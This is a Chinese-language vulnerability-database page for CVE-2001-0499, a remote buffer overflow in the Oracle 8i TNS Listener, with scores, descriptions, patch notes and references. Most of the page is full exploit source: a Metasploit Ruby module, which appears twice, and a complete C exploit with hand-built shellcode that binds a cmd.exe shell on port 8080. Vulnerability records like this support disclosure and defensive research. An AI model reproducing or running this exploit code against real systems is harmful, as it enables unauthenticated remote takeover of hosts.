CVE-2001-0499
CVSS10.0
发布时间 :2001-07-21 00:00:00
修订时间 :2008-09-10 15:08:13
NMCOEP    

[原文]Buffer overflow in Transparent Network Substrate (TNS) Listener in Oracle 8i 8.1.7 and earlier allows remote attackers to gain privileges via a long argument to the commands (1) STATUS, (2) PING, (3) SERVICES, (4) TRC_FILE, (5) SAVE_CONFIG, or (6) RELOAD.


[CNNVD]Oracle 8i TNS Listener缓冲区溢出漏洞(CNNVD-200107-140)

        
        Oracle 8i自带了一个程序TNS Listener,用于控制远程数据库终端与服务器的通信。
        TNS Listener实现上存在缓冲区溢出漏洞,远程攻击者利用这个漏洞可以在目标主机上执行任意代码,而且远程用户并不需要通过什么认证。
        对于Windows 2000/NT4系统,TNS Listener是以本地管理员身份运行的,攻击者利用这个漏洞,可以直接获得这台主机的控制权。
        对于其它操作系统,TNS Listener是以自己的身份运行的,攻击者利用这个漏洞,可以获得对目标主机的本地访问权限,可以为进一步攻击创造条件。
        

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0499
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0499
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200107-140
(官方数据源) CNNVD

- 其它链接及资源

http://www.kb.cert.org/vuls/id/620495
(UNKNOWN)  CERT-VN  VU#620495
http://www.cert.org/advisories/CA-2001-16.html
(UNKNOWN)  CERT  CA-2001-16
http://xforce.iss.net/xforce/xfdb/6758
(UNKNOWN)  XF  oracle-tns-listener-bo(6758)
http://www.securityfocus.com/bid/2941
(UNKNOWN)  BID  2941
http://www.nai.com/research/covert/advisories/050.asp
(UNKNOWN)  NAI  20010627 Vulnerability in Oracle 8i TNS Listener

- 漏洞信息

Oracle 8i TNS Listener缓冲区溢出漏洞
危急 边界条件错误
2001-07-21 00:00:00 2005-10-20 00:00:00
远程  
        
        Oracle 8i自带了一个程序TNS Listener,用于控制远程数据库终端与服务器的通信。
        TNS Listener实现上存在缓冲区溢出漏洞,远程攻击者利用这个漏洞可以在目标主机上执行任意代码,而且远程用户并不需要通过什么认证。
        对于Windows 2000/NT4系统,TNS Listener是以本地管理员身份运行的,攻击者利用这个漏洞,可以直接获得这台主机的控制权。
        对于其它操作系统,TNS Listener是以自己的身份运行的,攻击者利用这个漏洞,可以获得对目标主机的本地访问权限,可以为进一步攻击创造条件。
        

- 公告与补丁

        厂商补丁:
        Oracle
        ------
        Oracle已经为此分配了BUG序号1489683,并已经提供了相应补丁。它们可以从Oracle的全球支持服务站点下载:
        
        http://metalink.oracle.com

- 漏洞信息 (16340)

Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow (EDBID:16340)
windows remote
2010-11-24 Verified
0 metasploit
N/A [点击下载]
##
# $Id: tns_arguments.rb 11122 2010-11-24 06:10:13Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Oracle 8i. When
				sending a specially crafted packet containing a overly long
				ARGUMENTS string to the TNS service, an attacker may be able
				to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 11122 $',
			'References'     =>
				[
					[ 'CVE', '2001-0499' ],
					[ 'OSVDB', '9427'],
					[ 'BID', '2941' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 28 2001'))

		register_options([Opt::RPORT(1521)], self.class)
	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"

		pkt = tns_packet(version)

		sock.put(pkt)

		sock.get_once

		res = sock.get_once(-1, 1)

		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)

			sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"

			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
		

- 漏洞信息 (20980)

Oracle 8i TNS Listener Buffer Overflow Vulnerability (EDBID:20980)
windows remote
2001-07-20 Verified
0 benjurry
N/A [点击下载]
source: http://www.securityfocus.com/bid/2941/info

Oracle 8i ships with a component called TNS Listener. TNS Listener is used to arbitrate communication between remote database clients/applications and the database server.

There exists a remotely exploitable buffer overflow in TNS Listener. Remote attackers can execute arbitrary code on affected hosts. This vulnerability does not require authentication to exploit.

On Windows 2000/NT4 systems, TNS Listener runs with 'LocalSystem' privileges. These are equivelent to administrative and any attacker to exploit this vulnerability on such a system would gain control over it.

On Unix systems, Oracle processes such as the listener typically run as their own userid. Exploitation of this vulnerability on these systems would provide an attacker with local access to the victim host. It is significantly easier for attackers to compromise the entire system with local access.

Note: Versions 8.1.5, 8.1.6, and 8.1.7 are confirmed as being vulnerable. Previous versions are likely vulnerable as well. 


/*Oracle TNS SEH Exploit By Benjurry.

Oracle Remote Vulnerability discoveried by COVERT Labs
Code by benjurry,benjurry@xfocus.org
Welcome to http://www.xfocus.net & http://www.xfocus.org
Thank my friends:Batman,xq and Yuange.
Thank members of Xfocus.
This Exploit only test on Win2k Chinese +sp2 and Oracle 8.1.7

2001.7.20



*/
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#include <stdlib.h>
#pragma comment (lib,"Ws2_32")

#define  FNENDLONG     0x08
#define  NOPCODE     0x90
#define  NOPLONG       0x20
#define  BUFFSIZE      0x1b00
#define  RETEIPADDRESS 0x0
#define  SHELLPORT     0x1f90  //shell port =8080
#define PORT 1521

void     shellcodefnlock();
void     shellcodefn();

void     cleanchkesp(char *fnadd,char *shellbuff,char *chkespadd ,int len);

int main(int argc, char *argv[])
{
 char *str="\x1f\x90""LoadLibraryA""\x0""CreatePipe""\x0"
       "CreateProcessA""\x0""CloseHandle""\x0"
       "PeekNamedPipe""\x0"
       "ReadFile""\x0""WriteFile""\x0"
       "wsock32.dll""\x0""socket""\x0"
       "bind""\x0""listen""\x0"
       "accept""\x0""send""\x0"
       "recv""\x0""ioctlsocket""\x0"
       "closesocket""\x0"
       "cmd.exe""\x0""exit\x0d\x0a""\x0"
       "strend";


   char *fnendstr="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
  char cmd1[]="(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))(COMMAND=status)(ARGUMENTS=3)(SERVICE=";
  char cmd2[]="1)(VERSION=1)))";
  char head[]="\x00\x59\x00\x00\x01\x00\x00\x00\x01\x36"
   "\x01\x2c\x00\x00\x08\x00\x7f\xff\x7f\x08\x00\x00\x00\x01"
   "\x00\x1f\x00\x3a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
   "\x00\x00\x00\x00\x00\x00\x34\xe6\x00\x00\x00\x01\x00\x00"
   "\x00\x00\x00\x00\x00\x00";
  char  eipwinnt[]="\x63\x0d\xfa\x7f";    // jmp ebx

char  JMPNEXTJMP[]="\xeb\x06\x90\x90";
  char  JMPSHELL[]="\xe9\x2a\xe7\xff\xff";

  char    buff[BUFFSIZE];
  char    recvbuff[BUFFSIZE];
  char    shellcodebuff[0x1000];
   char    *shellcodefnadd,*chkespadd;
     unsigned  char temp;
  int OVERADD2=6346;
  char buffer2[BUFFSIZE];
  int ret;
 int packetlength;
 int cmdlength;
 int tt,shellcodeport,sendpacketlong;
 int i,j,k;
 int OVERADD=0;

 WSADATA WSAData;
 struct hostent          *ht;
 struct sockaddr_in      server;
 memset(buff,NOPCODE,BUFFSIZE);
 printf("Oracle Remote Vulnerability discoveried by COVERT Labs\n");
 printf("Code by benjurry,benjurry@xfocus.org\n");
 printf("Welcome to http://www.xfocus.net\n");
 if(argc<2)
 {
  printf("useage:%s target\n",argv[0]);
exit(1);
 }

 if((tt=WSAStartup(MAKEWORD(1,1), &WSAData)) != 0)
        {
                printf("WSAStartup failed.\n");
    tt=GetLastError();
                WSACleanup();
                exit(1);
        }
if((ht = gethostbyname(argv[1]))==0)
{
                printf("Unable to resolve host %s\n",argv[1]);
                exit(1);
        }
server.sin_port = htons(PORT);
server.sin_family=AF_INET;
server.sin_addr=*((struct in_addr *)ht->h_addr);
   if((ret = socket(AF_INET, SOCK_STREAM, 0)) == -1)
        {
                printf("Unable to set up socket\n");
                exit(1);
        }

if((connect(ret, (struct sockaddr *) &server, sizeof(server))) == -1)
        {
                printf("Unable to connect\n");
                exit(1);
        }
        else
                printf("Connected.\n");









_asm{
        mov ESI,ESP
        cmp ESI,ESP

  }
 _chkesp();
  chkespadd=(char *)_chkesp;
  temp=*chkespadd;
  if(temp==0xe9) {
         ++chkespadd;
          i=*(int*)chkespadd;
         chkespadd+=i;
         chkespadd+=4;
  }

  shellcodefnadd=(char *)shellcodefnlock;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
         ++shellcodefnadd;
         k=*(int *)shellcodefnadd;
         shellcodefnadd+=k;
         shellcodefnadd+=4;
  }

  for(k=0;k<=0x500;++k){
       if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }




   memset(buff,'\x42',BUFFSIZE);
   for(i=0;i<NOPLONG;i++)
    buff[i]='\x90';

 memcpy(buff+OVERADD+NOPLONG,shellcodefnadd+k+4,0x80);

  shellcodefnadd=(char *)shellcodefn;
  temp=*shellcodefnadd;
  if(temp==0xe9) {
    ++shellcodefnadd;
    k=*(int *)shellcodefnadd;
           shellcodefnadd+=k;
    shellcodefnadd+=4;
  }


  for(k=0;k<=0x1000;++k){
    if(memcmp(shellcodefnadd+k,fnendstr,FNENDLONG)==0) break;
  }

  memcpy(shellcodebuff,shellcodefnadd,k);
  cleanchkesp(shellcodefnadd,shellcodebuff,chkespadd,k);
  for(i=0;i<0x400;++i){
    if(memcmp(str+i,"strend",6)==0) break;
  }
  memcpy(shellcodebuff+k,str,i);


  shellcodeport=SHELLPORT;
  shellcodeport=htons(shellcodeport);
  *(u_short *)(shellcodebuff+k)=shellcodeport;
  fprintf(stderr,"\n shellport %d",htons(shellcodeport));

  sendpacketlong=k+i;
  for(k=0;k<=0x200;++k){
         if(memcmp(buff+OVERADD+NOPLONG+k,fnendstr,FNENDLONG)==0) break;
  }

 for(i=0;i<sendpacketlong;++i){
      temp=shellcodebuff[i];
      if(temp<=0x10||temp=='0'){

       buff[OVERADD+NOPLONG+k]='0';
       ++k;
       temp+=0x40;
      }
      buff[OVERADD+NOPLONG+k]=temp;
      ++k;
}



   memcpy(buff+OVERADD2,JMPNEXTJMP,4);


// }
memcpy(buff+OVERADD2+4,eipwinnt,4);

 memcpy(buff+OVERADD2+8,JMPSHELL,5);

 for(i=OVERADD2+13;i<BUFFSIZE;i++)
  buff[i]='\x90';


 memset(buffer2,'\x90',sizeof(buffer2));
 memcpy(buffer2,head,sizeof(head)-1);
 memcpy(buffer2+sizeof(head)-1,cmd1,sizeof(cmd1)-1);
 memcpy(buffer2+sizeof(head)-1+sizeof(cmd1)-1,buff,sizeof(buff));
 memcpy(buffer2+sizeof(head)+sizeof(cmd1)+sizeof(buff)-3,cmd2,sizeof(cmd2)-1);


 packetlength=58+sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;
 cmdlength=sizeof(buff)+sizeof(cmd1)+sizeof(cmd2)-3;

 buffer2[0]=packetlength>> 8;
 buffer2[1]=packetlength & 0xff;
 buffer2[24]=cmdlength>>8;
 buffer2[25]=cmdlength& 0xff;





  if(send(ret, buffer2, packetlength, 0) == -1)
        {
                printf("Unable to send\n");
                exit(1);
        }
        else
        {
                printf("code sented...\n");

        }
Sleep(1000);
closesocket(ret);
return 0;


}

void  shellcodefnlock()
{
       _asm{
              nop
              nop
              nop
              nop
              nop
              nop
              nop
              nop

              jmp   next
getediadd:              pop   EDI
              push  EDI
              pop   ESI
              xor   ecx,ecx
              mov   cx,0x0fd0
looplock:            lodsb
        cmp   al,0x30
        jnz   sto
                     lodsb
        sub   al,0x40
sto:                 stosb
        loop  looplock
        jmp   shell
next:                call  getediadd

shell:         NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP
        NOP

    }
}

/*bind cmd.exe  */
void shellcodefn()
{    char        Buff[0x800];
    int         *except[3];

    FARPROC     closesocketadd;
    FARPROC     ioctlsocketadd;
    FARPROC     recvadd;
           FARPROC     sendadd;
           FARPROC     acceptadd;
           FARPROC     listenadd;
           FARPROC     bindadd;
      FARPROC        socketadd;
//    FARPROC     WSAStartupadd;

    FARPROC        NOPNOP;

    FARPROC     WriteFileadd;
    FARPROC     ReadFileadd;
    FARPROC     PeekNamedPipeadd;
    FARPROC     CloseHandleadd;
    FARPROC     CreateProcessadd;
    FARPROC     CreatePipeadd;
    FARPROC     procloadlib;

    FARPROC     apifnadd[1];
    FARPROC     procgetadd=0;

    char        *stradd;
    int         imgbase,fnbase,k,l;
    HANDLE      libhandle;   //libwsock32;
           STARTUPINFO siinfo;
           SOCKET      listenFD,clientFD;
           struct      sockaddr_in server;
           int         iAddrSize = sizeof(server);
    int         lBytesRead;
    u_short     shellcodeport;

           PROCESS_INFORMATION ProcessInformation;
           HANDLE      hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
           SECURITY_ATTRIBUTES sa;
    _asm {     jmp    nextcall
         getstradd:   pop    stradd
                      lea    EDI,except
                    mov    eax,dword ptr FS:[0]
        mov    dword ptr [edi+0x08],eax
        mov    dword ptr FS:[0],EDI

    }
       except[0]=0xffffffff;
       except[1]=stradd-0x07;

       imgbase=0x77e00000;
       _asm{
          call getexceptretadd
       }
for(;imgbase<0xbffa0000,procgetadd==0;){
     imgbase+=0x10000;
     if(imgbase==0x78000000) imgbase=0xbff00000;
     if(*( WORD *)imgbase=='ZM'&& *(WORD *)(imgbase+*(int *)(imgbase+0x3c))=='EP'){
    fnbase=*(int *)(imgbase+*(int *)(imgbase+0x3c)+0x78)+imgbase;
    k=*(int *)(fnbase+0xc)+imgbase;
    if(*(int *)k =='NREK'&&*(int *)(k+4)=='23LE'){
        libhandle=imgbase;
       k=imgbase+*(int *)(fnbase+0x20);
       for(l=0;l<*(int *) (fnbase+0x18);++l,k+=4){
          if(*(int *)(imgbase+*(int *)k)=='PteG'&&*(int *)(4+imgbase+*(int *)k)=='Acor'){
             k=*(WORD *)(l+l+imgbase+*(int *)(fnbase+0x24));
             k+=*(int *)(fnbase+0x10)-1;
             k=*(int *)(k+k+k+k+imgbase+*(int *)(fnbase+0x1c));
             procgetadd=k+imgbase;
             break;
           }
        }
    }
        }
    }


  _asm{
           lea edi,except
           mov eax,dword ptr [edi+0x08]
    mov dword ptr fs:[0],eax
   }


   if(procgetadd==0) goto  die ;

   shellcodeport=*(u_short *)stradd;
   stradd+=2;
   for(k=1;k<17;++k) {
    if(k==8) libhandle=procloadlib(stradd);
    else     apifnadd[k]=procgetadd(libhandle,stradd);
    for(;;++stradd){
         if(*(stradd)==0&&*(stradd+1)!=0) break;
    }
    ++stradd;
   }

//           WSAStartupadd(MAKEWORD(1, 1), &wsaData);

            listenFD = socketadd(AF_INET,SOCK_STREAM,IPPROTO_TCP);
            server.sin_family = AF_INET;
            server.sin_port =shellcodeport;
            //SHELLPORT;
            server.sin_addr.s_addr=0;
        k=1;
     while(k!=0){
          k=bindadd(listenFD,&server,sizeof(server));
                 server.sin_port+=0x100;
          if(server.sin_port<0x100) ++server.sin_port;
            }
     listenadd(listenFD,10);

while(1){
            sa.nLength=12;
            sa.lpSecurityDescriptor=0;
            sa.bInheritHandle=TRUE;

            CreatePipeadd(&hReadPipe1,&hWritePipe1,&sa,0);
            CreatePipeadd(&hReadPipe2,&hWritePipe2,&sa,0);

// ZeroMemory(&siinfo,sizeof(siinfo));
            _asm{
                 lea EDI,siinfo
                xor eax,eax
                mov ecx,0x11
                repnz stosd
            }
    siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    siinfo.wShowWindow = SW_HIDE;
    siinfo.hStdInput = hReadPipe2;
    siinfo.hStdOutput=hWritePipe1;
    siinfo.hStdError =hWritePipe1;

//   k=0;
//    while(k==0)
//    {
    k=CreateProcessadd(NULL,stradd,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
//        stradd+=8;
//    }
    PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);

    clientFD=acceptadd(listenFD,&server,&iAddrSize);

    while(1) {
        PeekNamedPipeadd(hReadPipe1,Buff,1024,&lBytesRead,0,0);
        if(lBytesRead>0) {
              ReadFileadd(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
              if(lBytesRead>0) sendadd(clientFD,Buff,lBytesRead,0);
              else sendadd(clientFD,stradd,8,0);
        }
        else {
            lBytesRead=recvadd(clientFD,Buff,1024,0);

            if(lBytesRead<=0){
//                    CloseHandleadd(ProcessInformation.hProcess);  //.dwProcessId);
                   lBytesRead=6;
                   WriteFileadd(hWritePipe2,stradd+8,lBytesRead,&lBytesRead,0);
                   closesocketadd(clientFD);
                   break;
            }
            else{
                   sendadd(clientFD,Buff,lBytesRead,0);

                   WriteFileadd(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
            }
        }
    }
}




      die: goto die  ;
        _asm{

getexceptretadd:   pop  eax
            push eax
            mov  edi,dword ptr [stradd]
            mov dword ptr [edi-0x0e],eax
            ret
errprogram:        mov eax,dword ptr [esp+0x0c]
            add eax,0xb8
            mov dword ptr [eax],0x11223344  //stradd-0xe
            xor eax,eax        //2
            ret        //1
execptprogram:     jmp errprogram    //2 bytes     stradd-7
nextcall:          call getstradd    //5 bytes
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
            NOP
    }
}


void cleanchkesp(char *fnadd,char *shellbuff,char * chkesp,int len)
{
   int i,k;
   unsigned char temp;
   char *calladd;

   for(i=0;i<len;++i){
       temp=shellbuff[i];
       if(temp==0xe8){
             k=*(int *)(shellbuff+i+1);
        calladd=fnadd;
      calladd+=k;
      calladd+=i;
      calladd+=5;
      if(calladd==chkesp){
              shellbuff[i]=0x90;
              shellbuff[i+1]=0x43;   // inc ebx
        shellbuff[i+2]=0x4b;    // dec ebx
        shellbuff[i+3]=0x43;
        shellbuff[i+4]=0x4b;
       }
        }
   }
}
		

- 漏洞信息 (F83067)

Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow. (PacketStormID:F83067)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow,arbitrary
CVE-2001-0499
[点击下载]

This Metasploit module exploits a stack overflow in Oracle 8i. When sending a specially crafted packet containing a overly long ARGUMENTS string to the TNS service, an attacker may be able to execute arbitrary code.

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TNS

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Oracle 8i TNS Listener (ARGUMENTS) Buffer Overflow.',
			'Description'    => %q{
				This module exploits a stack overflow in Oracle 8i. When
				sending a specially crafted packet containing a overly long
				ARGUMENTS string to the TNS service, an attacker may be able 
				to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,			
			'Version'        => '$Revision: 6637 $',
			'References'     => 
				[ 
					[ 'CVE', '2001-0499' ],
					[ 'OSVDB', '9427'],
					[ 'BID', '2941' ],
				],
			'Privileged'     => true,
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 600,
					'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c&=+?:;-,/#.\\\$\% ()",
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2000)',   { 'Offset' => 6383, 'Ret' => 0x60a1e154 } ],
					[ 'Oracle 8.1.7.0.0 Standard Edition (Windows 2003)',   { 'Offset' => 6379, 'Ret' => 0x60a1e154 }] ,
				],
			'DefaultTarget' => 0,
			'DisclosureDate' => 'Jun 28 2001'))

			register_options([Opt::RPORT(1521)], self.class)

	end

	def check
		connect

		version = "(CONNECT_DATA=(COMMAND=VERSION))"
	
		pkt = tns_packet(version)

		sock.put(pkt)
		
		sock.get_once

		res = sock.get_once(-1, 1)
		
		disconnect

			if ( res and res =~ /32-bit Windows: Version 8\.1\.7\.0\.0/ )
				return Exploit::CheckCode::Vulnerable
			end
				return Exploit::CheckCode::Safe
	end

	def exploit
		connect

			buff =  rand_text_alpha_upper(target['Offset'] - payload.encoded.length) + payload.encoded
			buff << Rex::Arch::X86.jmp_short(6) + make_nops(2) + [target.ret].pack('V')
			buff << [0xe8, -550].pack('CV') + rand_text_alpha_upper(966)

			sploit = "(CONNECT_DATA=(COMMAND=STATUS)(ARGUMENTS=#{buff}))"
			
			pkt = tns_packet(sploit)

			print_status("Trying target #{target.name}...")
			sock.put(pkt)

			handler

		disconnect
	end

end
    

- 漏洞信息

9427
Oracle TNS Listener Multiple Command Argument Handling Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Patch / RCS
Exploit Public, Exploit Commercial Vendor Verified

- 漏洞描述

A buffer overflow exists in Oracle. The TNS Listener fails to validate passed to the STATUS, PING, SERVICES, TRC_FILE, SAVE_CONFIG and RELOAD commands resulting in a stack overflow. With a specially crafted request, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-06-27 Unknow
2001-07-20 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Oracle has released a patch to address this vulnerability.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站